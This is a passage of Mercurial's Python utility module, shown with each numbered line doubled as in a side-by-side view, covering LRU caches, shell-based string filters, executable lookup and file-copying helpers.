583 return [(k, self[k]) for k in self._list]
583 return [(k, self[k]) for k in self._list]
584 def __delitem__(self, key):
584 def __delitem__(self, key):
585 dict.__delitem__(self, key)
585 dict.__delitem__(self, key)
586 self._list.remove(key)
586 self._list.remove(key)
587 def pop(self, key, *args, **kwargs):
587 def pop(self, key, *args, **kwargs):
588 try:
588 try:
589 self._list.remove(key)
589 self._list.remove(key)
590 except ValueError:
590 except ValueError:
591 pass
591 pass
592 return dict.pop(self, key, *args, **kwargs)
592 return dict.pop(self, key, *args, **kwargs)
593 def keys(self):
593 def keys(self):
594 return self._list[:]
594 return self._list[:]
595 def iterkeys(self):
595 def iterkeys(self):
596 return self._list.__iter__()
596 return self._list.__iter__()
597 def iteritems(self):
597 def iteritems(self):
598 for k in self._list:
598 for k in self._list:
599 yield k, self[k]
599 yield k, self[k]
600 def insert(self, index, key, val):
600 def insert(self, index, key, val):
601 self._list.insert(index, key)
601 self._list.insert(index, key)
602 dict.__setitem__(self, key, val)
602 dict.__setitem__(self, key, val)
603 def __repr__(self):
603 def __repr__(self):
604 if not self:
604 if not self:
605 return '%s()' % self.__class__.__name__
605 return '%s()' % self.__class__.__name__
606 return '%s(%r)' % (self.__class__.__name__, self.items())
606 return '%s(%r)' % (self.__class__.__name__, self.items())
607
607
608 class _lrucachenode(object):
608 class _lrucachenode(object):
609 """A node in a doubly linked list.
609 """A node in a doubly linked list.
610
610
611 Holds a reference to nodes on either side as well as a key-value
611 Holds a reference to nodes on either side as well as a key-value
612 pair for the dictionary entry.
612 pair for the dictionary entry.
613 """
613 """
614 __slots__ = (u'next', u'prev', u'key', u'value')
614 __slots__ = (u'next', u'prev', u'key', u'value')
615
615
616 def __init__(self):
616 def __init__(self):
617 self.next = None
617 self.next = None
618 self.prev = None
618 self.prev = None
619
619
620 self.key = _notset
620 self.key = _notset
621 self.value = None
621 self.value = None
622
622
623 def markempty(self):
623 def markempty(self):
624 """Mark the node as emptied."""
624 """Mark the node as emptied."""
625 self.key = _notset
625 self.key = _notset
626
626
627 class lrucachedict(object):
627 class lrucachedict(object):
628 """Dict that caches most recent accesses and sets.
628 """Dict that caches most recent accesses and sets.
629
629
630 The dict consists of an actual backing dict - indexed by original
630 The dict consists of an actual backing dict - indexed by original
631 key - and a doubly linked circular list defining the order of entries in
631 key - and a doubly linked circular list defining the order of entries in
632 the cache.
632 the cache.
633
633
634 The head node is the newest entry in the cache. If the cache is full,
634 The head node is the newest entry in the cache. If the cache is full,
635 we recycle head.prev and make it the new head. Cache accesses result in
635 we recycle head.prev and make it the new head. Cache accesses result in
636 the node being moved to before the existing head and being marked as the
636 the node being moved to before the existing head and being marked as the
637 new head node.
637 new head node.
638 """
638 """
639 def __init__(self, max):
639 def __init__(self, max):
640 self._cache = {}
640 self._cache = {}
641
641
642 self._head = head = _lrucachenode()
642 self._head = head = _lrucachenode()
643 head.prev = head
643 head.prev = head
644 head.next = head
644 head.next = head
645 self._size = 1
645 self._size = 1
646 self._capacity = max
646 self._capacity = max
647
647
648 def __len__(self):
648 def __len__(self):
649 return len(self._cache)
649 return len(self._cache)
650
650
651 def __contains__(self, k):
651 def __contains__(self, k):
652 return k in self._cache
652 return k in self._cache
653
653
654 def __iter__(self):
654 def __iter__(self):
655 # We don't have to iterate in cache order, but why not.
655 # We don't have to iterate in cache order, but why not.
656 n = self._head
656 n = self._head
657 for i in range(len(self._cache)):
657 for i in range(len(self._cache)):
658 yield n.key
658 yield n.key
659 n = n.next
659 n = n.next
660
660
661 def __getitem__(self, k):
661 def __getitem__(self, k):
662 node = self._cache[k]
662 node = self._cache[k]
663 self._movetohead(node)
663 self._movetohead(node)
664 return node.value
664 return node.value
665
665
666 def __setitem__(self, k, v):
666 def __setitem__(self, k, v):
667 node = self._cache.get(k)
667 node = self._cache.get(k)
668 # Replace existing value and mark as newest.
668 # Replace existing value and mark as newest.
669 if node is not None:
669 if node is not None:
670 node.value = v
670 node.value = v
671 self._movetohead(node)
671 self._movetohead(node)
672 return
672 return
673
673
674 if self._size < self._capacity:
674 if self._size < self._capacity:
675 node = self._addcapacity()
675 node = self._addcapacity()
676 else:
676 else:
677 # Grab the last/oldest item.
677 # Grab the last/oldest item.
678 node = self._head.prev
678 node = self._head.prev
679
679
680 # At capacity. Kill the old entry.
680 # At capacity. Kill the old entry.
681 if node.key is not _notset:
681 if node.key is not _notset:
682 del self._cache[node.key]
682 del self._cache[node.key]
683
683
684 node.key = k
684 node.key = k
685 node.value = v
685 node.value = v
686 self._cache[k] = node
686 self._cache[k] = node
687 # And mark it as newest entry. No need to adjust order since it
687 # And mark it as newest entry. No need to adjust order since it
688 # is already self._head.prev.
688 # is already self._head.prev.
689 self._head = node
689 self._head = node
690
690
691 def __delitem__(self, k):
691 def __delitem__(self, k):
692 node = self._cache.pop(k)
692 node = self._cache.pop(k)
693 node.markempty()
693 node.markempty()
694
694
695 # Temporarily mark as newest item before re-adjusting head to make
695 # Temporarily mark as newest item before re-adjusting head to make
696 # this node the oldest item.
696 # this node the oldest item.
697 self._movetohead(node)
697 self._movetohead(node)
698 self._head = node.next
698 self._head = node.next
699
699
700 # Additional dict methods.
700 # Additional dict methods.
701
701
702 def get(self, k, default=None):
702 def get(self, k, default=None):
703 try:
703 try:
704 return self._cache[k].value
704 return self._cache[k].value
705 except KeyError:
705 except KeyError:
706 return default
706 return default
707
707
708 def clear(self):
708 def clear(self):
709 n = self._head
709 n = self._head
710 while n.key is not _notset:
710 while n.key is not _notset:
711 n.markempty()
711 n.markempty()
712 n = n.next
712 n = n.next
713
713
714 self._cache.clear()
714 self._cache.clear()
715
715
716 def copy(self):
716 def copy(self):
717 result = lrucachedict(self._capacity)
717 result = lrucachedict(self._capacity)
718 n = self._head.prev
718 n = self._head.prev
719 # Iterate in oldest-to-newest order, so the copy has the right ordering
719 # Iterate in oldest-to-newest order, so the copy has the right ordering
720 for i in range(len(self._cache)):
720 for i in range(len(self._cache)):
721 result[n.key] = n.value
721 result[n.key] = n.value
722 n = n.prev
722 n = n.prev
723 return result
723 return result
724
724
725 def _movetohead(self, node):
725 def _movetohead(self, node):
726 """Mark a node as the newest, making it the new head.
726 """Mark a node as the newest, making it the new head.
727
727
728 When a node is accessed, it becomes the freshest entry in the LRU
728 When a node is accessed, it becomes the freshest entry in the LRU
729 list, which is denoted by self._head.
729 list, which is denoted by self._head.
730
730
731 Visually, let's make ``N`` the new head node (* denotes head):
731 Visually, let's make ``N`` the new head node (* denotes head):
732
732
733 previous/oldest <-> head <-> next/next newest
733 previous/oldest <-> head <-> next/next newest
734
734
735 ----<->--- A* ---<->-----
735 ----<->--- A* ---<->-----
736 | |
736 | |
737 E <-> D <-> N <-> C <-> B
737 E <-> D <-> N <-> C <-> B
738
738
739 To:
739 To:
740
740
741 ----<->--- N* ---<->-----
741 ----<->--- N* ---<->-----
742 | |
742 | |
743 E <-> D <-> C <-> B <-> A
743 E <-> D <-> C <-> B <-> A
744
744
745 This requires the following moves:
745 This requires the following moves:
746
746
747 C.next = D (node.prev.next = node.next)
747 C.next = D (node.prev.next = node.next)
748 D.prev = C (node.next.prev = node.prev)
748 D.prev = C (node.next.prev = node.prev)
749 E.next = N (head.prev.next = node)
749 E.next = N (head.prev.next = node)
750 N.prev = E (node.prev = head.prev)
750 N.prev = E (node.prev = head.prev)
751 N.next = A (node.next = head)
751 N.next = A (node.next = head)
752 A.prev = N (head.prev = node)
752 A.prev = N (head.prev = node)
753 """
753 """
754 head = self._head
754 head = self._head
755 # C.next = D
755 # C.next = D
756 node.prev.next = node.next
756 node.prev.next = node.next
757 # D.prev = C
757 # D.prev = C
758 node.next.prev = node.prev
758 node.next.prev = node.prev
759 # N.prev = E
759 # N.prev = E
760 node.prev = head.prev
760 node.prev = head.prev
761 # N.next = A
761 # N.next = A
762 # It is tempting to do just "head" here, however if node is
762 # It is tempting to do just "head" here, however if node is
763 # adjacent to head, this will do bad things.
763 # adjacent to head, this will do bad things.
764 node.next = head.prev.next
764 node.next = head.prev.next
765 # E.next = N
765 # E.next = N
766 node.next.prev = node
766 node.next.prev = node
767 # A.prev = N
767 # A.prev = N
768 node.prev.next = node
768 node.prev.next = node
769
769
770 self._head = node
770 self._head = node
771
771
772 def _addcapacity(self):
772 def _addcapacity(self):
773 """Add a node to the circular linked list.
773 """Add a node to the circular linked list.
774
774
775 The new node is inserted before the head node.
775 The new node is inserted before the head node.
776 """
776 """
777 head = self._head
777 head = self._head
778 node = _lrucachenode()
778 node = _lrucachenode()
779 head.prev.next = node
779 head.prev.next = node
780 node.prev = head.prev
780 node.prev = head.prev
781 node.next = head
781 node.next = head
782 head.prev = node
782 head.prev = node
783 self._size += 1
783 self._size += 1
784 return node
784 return node
785
785
786 def lrucachefunc(func):
786 def lrucachefunc(func):
787 '''cache most recent results of function calls'''
787 '''cache most recent results of function calls'''
788 cache = {}
788 cache = {}
789 order = collections.deque()
789 order = collections.deque()
790 if func.__code__.co_argcount == 1:
790 if func.__code__.co_argcount == 1:
791 def f(arg):
791 def f(arg):
792 if arg not in cache:
792 if arg not in cache:
793 if len(cache) > 20:
793 if len(cache) > 20:
794 del cache[order.popleft()]
794 del cache[order.popleft()]
795 cache[arg] = func(arg)
795 cache[arg] = func(arg)
796 else:
796 else:
797 order.remove(arg)
797 order.remove(arg)
798 order.append(arg)
798 order.append(arg)
799 return cache[arg]
799 return cache[arg]
800 else:
800 else:
801 def f(*args):
801 def f(*args):
802 if args not in cache:
802 if args not in cache:
803 if len(cache) > 20:
803 if len(cache) > 20:
804 del cache[order.popleft()]
804 del cache[order.popleft()]
805 cache[args] = func(*args)
805 cache[args] = func(*args)
806 else:
806 else:
807 order.remove(args)
807 order.remove(args)
808 order.append(args)
808 order.append(args)
809 return cache[args]
809 return cache[args]
810
810
811 return f
811 return f
812
812
813 class propertycache(object):
813 class propertycache(object):
814 def __init__(self, func):
814 def __init__(self, func):
815 self.func = func
815 self.func = func
816 self.name = func.__name__
816 self.name = func.__name__
817 def __get__(self, obj, type=None):
817 def __get__(self, obj, type=None):
818 result = self.func(obj)
818 result = self.func(obj)
819 self.cachevalue(obj, result)
819 self.cachevalue(obj, result)
820 return result
820 return result
821
821
822 def cachevalue(self, obj, value):
822 def cachevalue(self, obj, value):
823 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
823 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
824 obj.__dict__[self.name] = value
824 obj.__dict__[self.name] = value
825
825
826 def pipefilter(s, cmd):
826 def pipefilter(s, cmd):
827 '''filter string S through command CMD, returning its output'''
827 '''filter string S through command CMD, returning its output'''
828 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
828 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
829 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
829 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
830 pout, perr = p.communicate(s)
830 pout, perr = p.communicate(s)
831 return pout
831 return pout
832
832
833 def tempfilter(s, cmd):
833 def tempfilter(s, cmd):
834 '''filter string S through a pair of temporary files with CMD.
834 '''filter string S through a pair of temporary files with CMD.
835 CMD is used as a template to create the real command to be run,
835 CMD is used as a template to create the real command to be run,
836 with the strings INFILE and OUTFILE replaced by the real names of
836 with the strings INFILE and OUTFILE replaced by the real names of
837 the temporary files generated.'''
837 the temporary files generated.'''
838 inname, outname = None, None
838 inname, outname = None, None
839 try:
839 try:
840 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
840 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
841 fp = os.fdopen(infd, pycompat.sysstr('wb'))
841 fp = os.fdopen(infd, pycompat.sysstr('wb'))
842 fp.write(s)
842 fp.write(s)
843 fp.close()
843 fp.close()
844 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
844 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
845 os.close(outfd)
845 os.close(outfd)
846 cmd = cmd.replace('INFILE', inname)
846 cmd = cmd.replace('INFILE', inname)
847 cmd = cmd.replace('OUTFILE', outname)
847 cmd = cmd.replace('OUTFILE', outname)
848 code = os.system(cmd)
848 code = os.system(cmd)
849 if pycompat.sysplatform == 'OpenVMS' and code & 1:
849 if pycompat.sysplatform == 'OpenVMS' and code & 1:
850 code = 0
850 code = 0
851 if code:
851 if code:
852 raise Abort(_("command '%s' failed: %s") %
852 raise Abort(_("command '%s' failed: %s") %
853 (cmd, explainexit(code)))
853 (cmd, explainexit(code)))
854 return readfile(outname)
854 return readfile(outname)
855 finally:
855 finally:
856 try:
856 try:
857 if inname:
857 if inname:
858 os.unlink(inname)
858 os.unlink(inname)
859 except OSError:
859 except OSError:
860 pass
860 pass
861 try:
861 try:
862 if outname:
862 if outname:
863 os.unlink(outname)
863 os.unlink(outname)
864 except OSError:
864 except OSError:
865 pass
865 pass
866
866
867 filtertable = {
867 filtertable = {
868 'tempfile:': tempfilter,
868 'tempfile:': tempfilter,
869 'pipe:': pipefilter,
869 'pipe:': pipefilter,
870 }
870 }
871
871
872 def filter(s, cmd):
872 def filter(s, cmd):
873 "filter a string through a command that transforms its input to its output"
873 "filter a string through a command that transforms its input to its output"
874 for name, fn in filtertable.iteritems():
874 for name, fn in filtertable.iteritems():
875 if cmd.startswith(name):
875 if cmd.startswith(name):
876 return fn(s, cmd[len(name):].lstrip())
876 return fn(s, cmd[len(name):].lstrip())
877 return pipefilter(s, cmd)
877 return pipefilter(s, cmd)
878
878
879 def binary(s):
879 def binary(s):
880 """return true if a string is binary data"""
880 """return true if a string is binary data"""
881 return bool(s and '\0' in s)
881 return bool(s and '\0' in s)
882
882
883 def increasingchunks(source, min=1024, max=65536):
883 def increasingchunks(source, min=1024, max=65536):
884 '''return no less than min bytes per chunk while data remains,
884 '''return no less than min bytes per chunk while data remains,
885 doubling min after each chunk until it reaches max'''
885 doubling min after each chunk until it reaches max'''
886 def log2(x):
886 def log2(x):
887 if not x:
887 if not x:
888 return 0
888 return 0
889 i = 0
889 i = 0
890 while x:
890 while x:
891 x >>= 1
891 x >>= 1
892 i += 1
892 i += 1
893 return i - 1
893 return i - 1
894
894
895 buf = []
895 buf = []
896 blen = 0
896 blen = 0
897 for chunk in source:
897 for chunk in source:
898 buf.append(chunk)
898 buf.append(chunk)
899 blen += len(chunk)
899 blen += len(chunk)
900 if blen >= min:
900 if blen >= min:
901 if min < max:
901 if min < max:
902 min = min << 1
902 min = min << 1
903 nmin = 1 << log2(blen)
903 nmin = 1 << log2(blen)
904 if nmin > min:
904 if nmin > min:
905 min = nmin
905 min = nmin
906 if min > max:
906 if min > max:
907 min = max
907 min = max
908 yield ''.join(buf)
908 yield ''.join(buf)
909 blen = 0
909 blen = 0
910 buf = []
910 buf = []
911 if buf:
911 if buf:
912 yield ''.join(buf)
912 yield ''.join(buf)
913
913
914 Abort = error.Abort
914 Abort = error.Abort
915
915
916 def always(fn):
916 def always(fn):
917 return True
917 return True
918
918
919 def never(fn):
919 def never(fn):
920 return False
920 return False
921
921
922 def nogc(func):
922 def nogc(func):
923 """disable garbage collector
923 """disable garbage collector
924
924
925 Python's garbage collector triggers a GC each time a certain number of
925 Python's garbage collector triggers a GC each time a certain number of
926 container objects (the number being defined by gc.get_threshold()) are
926 container objects (the number being defined by gc.get_threshold()) are
927 allocated even when marked not to be tracked by the collector. Tracking has
927 allocated even when marked not to be tracked by the collector. Tracking has
928 no effect on when GCs are triggered, only on what objects the GC looks
928 no effect on when GCs are triggered, only on what objects the GC looks
929 into. As a workaround, disable GC while building complex (huge)
929 into. As a workaround, disable GC while building complex (huge)
930 containers.
930 containers.
931
931
932 This garbage collector issue have been fixed in 2.7.
932 This garbage collector issue have been fixed in 2.7.
933 """
933 """
934 if sys.version_info >= (2, 7):
934 if sys.version_info >= (2, 7):
935 return func
935 return func
936 def wrapper(*args, **kwargs):
936 def wrapper(*args, **kwargs):
937 gcenabled = gc.isenabled()
937 gcenabled = gc.isenabled()
938 gc.disable()
938 gc.disable()
939 try:
939 try:
940 return func(*args, **kwargs)
940 return func(*args, **kwargs)
941 finally:
941 finally:
942 if gcenabled:
942 if gcenabled:
943 gc.enable()
943 gc.enable()
944 return wrapper
944 return wrapper
945
945
946 def pathto(root, n1, n2):
946 def pathto(root, n1, n2):
947 '''return the relative path from one place to another.
947 '''return the relative path from one place to another.
948 root should use os.sep to separate directories
948 root should use os.sep to separate directories
949 n1 should use os.sep to separate directories
949 n1 should use os.sep to separate directories
950 n2 should use "/" to separate directories
950 n2 should use "/" to separate directories
951 returns an os.sep-separated path.
951 returns an os.sep-separated path.
952
952
953 If n1 is a relative path, it's assumed it's
953 If n1 is a relative path, it's assumed it's
954 relative to root.
954 relative to root.
955 n2 should always be relative to root.
955 n2 should always be relative to root.
956 '''
956 '''
957 if not n1:
957 if not n1:
958 return localpath(n2)
958 return localpath(n2)
959 if os.path.isabs(n1):
959 if os.path.isabs(n1):
960 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
960 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
961 return os.path.join(root, localpath(n2))
961 return os.path.join(root, localpath(n2))
962 n2 = '/'.join((pconvert(root), n2))
962 n2 = '/'.join((pconvert(root), n2))
963 a, b = splitpath(n1), n2.split('/')
963 a, b = splitpath(n1), n2.split('/')
964 a.reverse()
964 a.reverse()
965 b.reverse()
965 b.reverse()
966 while a and b and a[-1] == b[-1]:
966 while a and b and a[-1] == b[-1]:
967 a.pop()
967 a.pop()
968 b.pop()
968 b.pop()
969 b.reverse()
969 b.reverse()
970 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
970 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
971
971
972 def mainfrozen():
972 def mainfrozen():
973 """return True if we are a frozen executable.
973 """return True if we are a frozen executable.
974
974
975 The code supports py2exe (most common, Windows only) and tools/freeze
975 The code supports py2exe (most common, Windows only) and tools/freeze
976 (portable, not much used).
976 (portable, not much used).
977 """
977 """
978 return (safehasattr(sys, "frozen") or # new py2exe
978 return (safehasattr(sys, "frozen") or # new py2exe
979 safehasattr(sys, "importers") or # old py2exe
979 safehasattr(sys, "importers") or # old py2exe
980 imp.is_frozen(u"__main__")) # tools/freeze
980 imp.is_frozen(u"__main__")) # tools/freeze
981
981
982 # the location of data files matching the source code
982 # the location of data files matching the source code
983 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
983 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
984 # executable version (py2exe) doesn't support __file__
984 # executable version (py2exe) doesn't support __file__
985 datapath = os.path.dirname(pycompat.sysexecutable)
985 datapath = os.path.dirname(pycompat.sysexecutable)
986 else:
986 else:
987 datapath = os.path.dirname(pycompat.fsencode(__file__))
987 datapath = os.path.dirname(pycompat.fsencode(__file__))
988
988
989 i18n.setdatapath(datapath)
989 i18n.setdatapath(datapath)
990
990
991 _hgexecutable = None
991 _hgexecutable = None
992
992
993 def hgexecutable():
993 def hgexecutable():
994 """return location of the 'hg' executable.
994 """return location of the 'hg' executable.
995
995
996 Defaults to $HG or 'hg' in the search path.
996 Defaults to $HG or 'hg' in the search path.
997 """
997 """
998 if _hgexecutable is None:
998 if _hgexecutable is None:
999 hg = encoding.environ.get('HG')
999 hg = encoding.environ.get('HG')
1000 mainmod = sys.modules[pycompat.sysstr('__main__')]
1000 mainmod = sys.modules[pycompat.sysstr('__main__')]
1001 if hg:
1001 if hg:
1002 _sethgexecutable(hg)
1002 _sethgexecutable(hg)
1003 elif mainfrozen():
1003 elif mainfrozen():
1004 if getattr(sys, 'frozen', None) == 'macosx_app':
1004 if getattr(sys, 'frozen', None) == 'macosx_app':
1005 # Env variable set by py2app
1005 # Env variable set by py2app
1006 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1006 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1007 else:
1007 else:
1008 _sethgexecutable(pycompat.sysexecutable)
1008 _sethgexecutable(pycompat.sysexecutable)
1009 elif (os.path.basename(
1009 elif (os.path.basename(
1010 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1010 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1011 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1011 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1012 else:
1012 else:
1013 exe = findexe('hg') or os.path.basename(sys.argv[0])
1013 exe = findexe('hg') or os.path.basename(sys.argv[0])
1014 _sethgexecutable(exe)
1014 _sethgexecutable(exe)
1015 return _hgexecutable
1015 return _hgexecutable
1016
1016
1017 def _sethgexecutable(path):
1017 def _sethgexecutable(path):
1018 """set location of the 'hg' executable"""
1018 """set location of the 'hg' executable"""
1019 global _hgexecutable
1019 global _hgexecutable
1020 _hgexecutable = path
1020 _hgexecutable = path
1021
1021
1022 def _isstdout(f):
1022 def _isstdout(f):
1023 fileno = getattr(f, 'fileno', None)
1023 fileno = getattr(f, 'fileno', None)
1024 return fileno and fileno() == sys.__stdout__.fileno()
1024 return fileno and fileno() == sys.__stdout__.fileno()
1025
1025
1026 def shellenviron(environ=None):
1026 def shellenviron(environ=None):
1027 """return environ with optional override, useful for shelling out"""
1027 """return environ with optional override, useful for shelling out"""
1028 def py2shell(val):
1028 def py2shell(val):
1029 'convert python object into string that is useful to shell'
1029 'convert python object into string that is useful to shell'
1030 if val is None or val is False:
1030 if val is None or val is False:
1031 return '0'
1031 return '0'
1032 if val is True:
1032 if val is True:
1033 return '1'
1033 return '1'
1034 return str(val)
1034 return str(val)
1035 env = dict(encoding.environ)
1035 env = dict(encoding.environ)
1036 if environ:
1036 if environ:
1037 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1037 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1038 env['HG'] = hgexecutable()
1038 env['HG'] = hgexecutable()
1039 return env
1039 return env
1040
1040
1041 def system(cmd, environ=None, cwd=None, out=None):
1041 def system(cmd, environ=None, cwd=None, out=None):
1042 '''enhanced shell command execution.
1042 '''enhanced shell command execution.
1043 run with environment maybe modified, maybe in different dir.
1043 run with environment maybe modified, maybe in different dir.
1044
1044
1045 if out is specified, it is assumed to be a file-like object that has a
1045 if out is specified, it is assumed to be a file-like object that has a
1046 write() method. stdout and stderr will be redirected to out.'''
1046 write() method. stdout and stderr will be redirected to out.'''
1047 try:
1047 try:
1048 stdout.flush()
1048 stdout.flush()
1049 except Exception:
1049 except Exception:
1050 pass
1050 pass
1051 cmd = quotecommand(cmd)
1051 cmd = quotecommand(cmd)
1052 if pycompat.sysplatform == 'plan9' and (sys.version_info[0] == 2
1052 if pycompat.sysplatform == 'plan9' and (sys.version_info[0] == 2
1053 and sys.version_info[1] < 7):
1053 and sys.version_info[1] < 7):
1054 # subprocess kludge to work around issues in half-baked Python
1054 # subprocess kludge to work around issues in half-baked Python
1055 # ports, notably bichued/python:
1055 # ports, notably bichued/python:
1056 if not cwd is None:
1056 if not cwd is None:
1057 os.chdir(cwd)
1057 os.chdir(cwd)
1058 rc = os.system(cmd)
1058 rc = os.system(cmd)
1059 else:
1059 else:
1060 env = shellenviron(environ)
1060 env = shellenviron(environ)
1061 if out is None or _isstdout(out):
1061 if out is None or _isstdout(out):
1062 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1062 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1063 env=env, cwd=cwd)
1063 env=env, cwd=cwd)
1064 else:
1064 else:
1065 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1065 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1066 env=env, cwd=cwd, stdout=subprocess.PIPE,
1066 env=env, cwd=cwd, stdout=subprocess.PIPE,
1067 stderr=subprocess.STDOUT)
1067 stderr=subprocess.STDOUT)
1068 for line in iter(proc.stdout.readline, ''):
1068 for line in iter(proc.stdout.readline, ''):
1069 out.write(line)
1069 out.write(line)
1070 proc.wait()
1070 proc.wait()
1071 rc = proc.returncode
1071 rc = proc.returncode
1072 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1072 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1073 rc = 0
1073 rc = 0
1074 return rc
1074 return rc
1075
1075
1076 def checksignature(func):
1076 def checksignature(func):
1077 '''wrap a function with code to check for calling errors'''
1077 '''wrap a function with code to check for calling errors'''
1078 def check(*args, **kwargs):
1078 def check(*args, **kwargs):
1079 try:
1079 try:
1080 return func(*args, **kwargs)
1080 return func(*args, **kwargs)
1081 except TypeError:
1081 except TypeError:
1082 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1082 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1083 raise error.SignatureError
1083 raise error.SignatureError
1084 raise
1084 raise
1085
1085
1086 return check
1086 return check
1087
1087
1088 # a whilelist of known filesystems where hardlink works reliably
1088 # a whilelist of known filesystems where hardlink works reliably
1089 _hardlinkfswhitelist = set([
1089 _hardlinkfswhitelist = set([
1090 'btrfs',
1090 'btrfs',
1091 'ext2',
1091 'ext2',
1092 'ext3',
1092 'ext3',
1093 'ext4',
1093 'ext4',
1094 'hfs',
1094 'hfs',
1095 'jfs',
1095 'jfs',
1096 'reiserfs',
1096 'reiserfs',
1097 'tmpfs',
1097 'tmpfs',
1098 'ufs',
1098 'ufs',
1099 'xfs',
1099 'xfs',
1100 'zfs',
1100 'zfs',
1101 ])
1101 ])
1102
1102
1103 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1103 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1104 '''copy a file, preserving mode and optionally other stat info like
1104 '''copy a file, preserving mode and optionally other stat info like
1105 atime/mtime
1105 atime/mtime
1106
1106
1107 checkambig argument is used with filestat, and is useful only if
1107 checkambig argument is used with filestat, and is useful only if
1108 destination file is guarded by any lock (e.g. repo.lock or
1108 destination file is guarded by any lock (e.g. repo.lock or
1109 repo.wlock).
1109 repo.wlock).
1110
1110
1111 copystat and checkambig should be exclusive.
1111 copystat and checkambig should be exclusive.
1112 '''
1112 '''
1113 assert not (copystat and checkambig)
1113 assert not (copystat and checkambig)
1114 oldstat = None
1114 oldstat = None
1115 if os.path.lexists(dest):
1115 if os.path.lexists(dest):
1116 if checkambig:
1116 if checkambig:
1117 oldstat = checkambig and filestat(dest)
1117 oldstat = checkambig and filestat(dest)
1118 unlink(dest)
1118 unlink(dest)
1119 if hardlink:
1119 if hardlink:
1120 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1120 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1121 # unless we are confident that dest is on a whitelisted filesystem.
1121 # unless we are confident that dest is on a whitelisted filesystem.
1122 try:
1122 try:
1123 fstype = getfstype(os.path.dirname(dest))
1123 fstype = getfstype(os.path.dirname(dest))
1124 except OSError:
1124 except OSError:
1125 fstype = None
1125 fstype = None
1126 if fstype not in _hardlinkfswhitelist:
1126 if fstype not in _hardlinkfswhitelist:
1127 hardlink = False
1127 hardlink = False
1128 if hardlink:
1128 if hardlink:
1129 try:
1129 try:
1130 oslink(src, dest)
1130 oslink(src, dest)
1131 return
1131 return
1132 except (IOError, OSError):
1132 except (IOError, OSError):
1133 pass # fall back to normal copy
1133 pass # fall back to normal copy
1134 if os.path.islink(src):
1134 if os.path.islink(src):
1135 os.symlink(os.readlink(src), dest)
1135 os.symlink(os.readlink(src), dest)
1136 # copytime is ignored for symlinks, but in general copytime isn't needed
1136 # copytime is ignored for symlinks, but in general copytime isn't needed
1137 # for them anyway
1137 # for them anyway
1138 else:
1138 else:
1139 try:
1139 try:
1140 shutil.copyfile(src, dest)
1140 shutil.copyfile(src, dest)
1141 if copystat:
1141 if copystat:
1142 # copystat also copies mode
1142 # copystat also copies mode
1143 shutil.copystat(src, dest)
1143 shutil.copystat(src, dest)
1144 else:
1144 else:
1145 shutil.copymode(src, dest)
1145 shutil.copymode(src, dest)
1146 if oldstat and oldstat.stat:
1146 if oldstat and oldstat.stat:
1147 newstat = filestat(dest)
1147 newstat = filestat(dest)
1148 if newstat.isambig(oldstat):
1148 if newstat.isambig(oldstat):
1149 # stat of copied file is ambiguous to original one
1149 # stat of copied file is ambiguous to original one
1150 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1150 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1151 os.utime(dest, (advanced, advanced))
1151 os.utime(dest, (advanced, advanced))
1152 except shutil.Error as inst:
1152 except shutil.Error as inst:
1153 raise Abort(str(inst))
1153 raise Abort(str(inst))
1154
1154
1155 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1155 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1156 """Copy a directory tree using hardlinks if possible."""
1156 """Copy a directory tree using hardlinks if possible."""
1157 num = 0
1157 num = 0
1158
1158
1159 gettopic = lambda: hardlink and _('linking') or _('copying')
1159 gettopic = lambda: hardlink and _('linking') or _('copying')
1160
1160
1161 if os.path.isdir(src):
1161 if os.path.isdir(src):
1162 if hardlink is None:
1162 if hardlink is None:
1163 hardlink = (os.stat(src).st_dev ==
1163 hardlink = (os.stat(src).st_dev ==
1164 os.stat(os.path.dirname(dst)).st_dev)
1164 os.stat(os.path.dirname(dst)).st_dev)
1165 topic = gettopic()
1165 topic = gettopic()
1166 os.mkdir(dst)
1166 os.mkdir(dst)
1167 for name, kind in osutil.listdir(src):
1167 for name, kind in osutil.listdir(src):
1168 srcname = os.path.join(src, name)
1168 srcname = os.path.join(src, name)
1169 dstname = os.path.join(dst, name)
1169 dstname = os.path.join(dst, name)
1170 def nprog(t, pos):
1170 def nprog(t, pos):
1171 if pos is not None:
1171 if pos is not None:
1172 return progress(t, pos + num)
1172 return progress(t, pos + num)
